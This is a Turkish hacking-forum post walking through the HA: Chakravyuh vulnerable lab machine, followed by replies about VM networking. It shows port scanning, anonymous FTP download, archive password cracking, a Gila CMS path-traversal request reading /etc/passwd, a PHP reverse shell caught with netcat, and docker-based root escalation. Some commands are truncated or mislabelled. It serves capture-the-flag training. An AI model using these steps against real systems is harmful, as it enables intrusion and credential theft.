HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly

Xowly

Katılımcı Üye
17 Haz 2019
769
57
ғate
HA: Chakravyuh

Merhabalar değerli Türk Hack Team ailesi, bu konumda sizlere "HA: Chakravyuh Zafiyetli Makine Çözümünü" göstereceğim. Zafiyetli Makine Çözümünü yaptığım kaynağa ulaşmak için tıklayın; Tıklayın.https://www.hackingarticles.in/ha-chakravyuh-vulnhub-walkthrough/

zbz765.png
HA: Chakravyuh

JHW230.png


İsim: HA: Chakravyuh

Çıkış Tarihi: 30 Ekim 2019

Yapım: Hacking Articles

Dosya Boyutu: 1.1-Gb

Zorluk: Orta Düzey

Açıklama: "Root Erişimini Almak"

Hedef: final.txt

Seri: HA

9cM5eC.png


Her şeyden önce hedefimizi belirlemeye çalışıyoruz ve gerekli İP ve Mac Adreslerini belirliyoruz. netdiscover

6K3UIx.png

Hedef makinemiz içerisinde bulunan servis ve sağlayıcılar için bilgi toplamak amacıyla bağlantı noktalarını tarıyoruz. Tüm bağlantı noktalarını taradığımızda, hedef Makinede SSH hizmeti (22), HTTP servisi (80), FTP servisi (65530) bulunduğunu görüyoruz.

Kod:
 nmap -p- -A 192.168.1.105

A4f32U.png




Ardından tarayıcımıza 192.168.105 yazarak anasayfamıza gidiyoruz.


CLPI62.png


Daha sonra dikkatimizi 65530 limanına yönlendirilen hizmete yönlendirdik. FTP hizmetine girdikten sonra pub adında bir belge bulmaya çalışıyoruz. İçinde arjun adlı bir sıkıştırılmış"7z dosyası" var. Daha sonrasında get komutu yardımıyla indirmemizi yapıyoruz.

Kod:
 ftp 192.168.1.105 65530


Kod:
 Anonymous


Kod:
 ls


Kod:
 get arjun.7z


Kod:
 bye


fJCOCN.png



Daha sonrasında indirmemiz tamamlandığında dosyayı "Archive Manager" ile açmayı deniyoruz. Ardından karşımıza gelen ekranda bize bir şifre soruyor. Bu şifreyi çeşitli yollarla bulmayı deniyoruz.

Daha sonrasında "John The Ripper" aracını kullanmaktan başka çaremiz kalmıyor. Ardından şifrenin "xyz2john" olduğunu öğreniyoruz. Ardından bunu google kullanarak aratıyoruz. Ardından karşımıza "7z2john" çıkıyor.

Kod:
 python 7z2ctf.py arjun.7z > hash


Kod:
 john --wordlist=/usr/share/wordlists/rockyou.txt hash


Kod:
 john hash --show

Kod:
arjun.7z:family

6HOxT8.png




Sıkıştırılmış dosyayı, içinde gizli bir metin dosyası bulmak için açtık. Secret.txt açıldığında içinde kodlanmış bir metin bulunuyor. İlk bakışta, Base64 kodlu metin gibi görünüyordu.

Kod:
 Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E= [/COLOR]

BaIURf.png




Echo ve base64 komutunu kullanarak secret.txt dosyasındaki metnin kodunu çözmeyi başardık.


Kod:
 echo "Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=" | base64 -d


Kod:
 gila:[email protected]:princesa


yUeP9f.png


Gila CMS'ye sahip olduğumuz ipucunu aldık. Ardından buraya erişim sağlamaya çalıştık. Sonucunda bir web sayfası önümüze geldi.

Kod:
 http://192.168.1.105/gila/


GKSIOb.png


Ardından" /gila/admin " şeklinde girmeyi deniyoruz.​

Kod:
 http://192.168.1.105/gila/admin




Kod:
princesa

P2V51c.png

Ardından admin paneline giriş yapmış bulunduk. Daha sonrasında exploit için bir yol aramaya başladık.


x6G14d.png



Ardından araştırmalarımız sonucunda bir şey bulamadık. Bundan dolayı searchsploit içerisinde keşif yapıyoruz.


Kod:
 searchsploit gila cms


Kod:
 Gila CMS < 1.11.1 - Local File Inclusio

Kod:
 searchsploit -m 47407

Kod:
 cat 47407.txt

4cR57H.png


Xampp Server üzerinde çalıştığını ve hedef makinemizin bir Linux makinesi olduğunu rahatça görebiliyoruz. Böylece, "/etc/passwd" da bulunan linki değiştirdik. Ayrıca, gilacms bölümünde hali hazırda bir web sayfası bulunuyor. /gila/ 'da gördük. Böylece biz de o kısmı değiştirdik.

Kod:
 http://192.168.1.105/gila/admin/fm/?f=src../../../../../../../../../etc/passwd


IbzKAa.png



İndex.php dosyasına sahip olduğumuzu görüyoruz. Girdiğimiz yol gibiydi. Dosyayı açtık. Dizin sayfasının görüntülenmesi için PHP kodunu içeriyordu. PHP reverse shell kodumuzu pentestmonkey ile kullandık. IP Adresini Saldırgan Makinemizin IP adresi ile değiştirdik. Saldırgan makinemizde bir netcat dinlemesi başlattık. Gerekli değişiklikleri yaptıktan sonra değişiklikleri index.php içerisine kaydettik. Ardından dosyayı açtık


7e81xG.png


Dosyayı açtığımızda, PHP'nin reverse shell'i çalıştı ve shell'i hedef makineye aldık. Yanlış bir shell olduğundan uygun bir shell'e dönüştürmek için kullandık. Memnuniyeti gereğince kabuğu aldıktan sonra, hedef makinedeki kullanıcıları ve grupları görmek için id komutunu çalıştırdık.​


Kod:
nc -lvp 1234

Kod:
python -c 'import

Kod:
id

6NUc0C.png



Docker çalışırken, docker'da docker'daki tüm komutların sudo gerektirmesi ve docker'ın çalışması için root gerektirmesi sorunu olduğunu biliyoruz. Bundan dolayı aşağıdaki komutu çalıştırıyoruz.

Kod:
 docker run -v /root:/mnt -it alpine

Kod:
cd /mnt

Kod:
ls

Kod:
cat final.txt


PJOeRx.png





Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler



T5a2CB.png
 

ZVkill3r

Katılımcı Üye
16 Tem 2019
487
2
50
Öncelikle tebrik ederim. Harika bir konu olmuş. İndirdim. Lakin ağ konfigürasyonu yapmama rağmen ip gelmiyor. Ubuntu 18.04 LTS şeklinde açılıp, giriş bilgileri istiyor. Ne yapsam bilemedim. Yardımlarınızı bekliyorum
 

By Ghost

Katılımcı Üye
11 Tem 2013
941
2
C:\Linux
Öncelikle tebrik ederim. Harika bir konu olmuş. İndirdim. Lakin ağ konfigürasyonu yapmama rağmen ip gelmiyor. Ubuntu 18.04 LTS şeklinde açılıp, giriş bilgileri istiyor. Ne yapsam bilemedim. Yardımlarınızı bekliyorum

Bildiğim kadarıyla iki makinenin (sizin kullandığınız sistem ve ctf makinesi) bridge de çalışması gerek birisi bile NAT olduğu zaman aynı ağda olamıyorsunuz. Bunu yapmanıza rağmen gelmiyorsa VMware taraflı bi network ayarı bozulmuş olabilir. Emin değilim tam
 

Xowly

Katılımcı Üye
17 Haz 2019
769
57
ғate
Başarılı bir konu tebrik ederim.

faydalı teşekkürler

Teşekkür ederim :)

Öncelikle tebrik ederim. Harika bir konu olmuş. İndirdim. Lakin ağ konfigürasyonu yapmama rağmen ip gelmiyor. Ubuntu 18.04 LTS şeklinde açılıp, giriş bilgileri istiyor. Ne yapsam bilemedim. Yardımlarınızı bekliyorum

Merhabalar,

Eğer öm üzerinden yazarsanız detaylı bir şekilde yardımcı olabilirim. Yorumunuz için çok teşekkürler :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.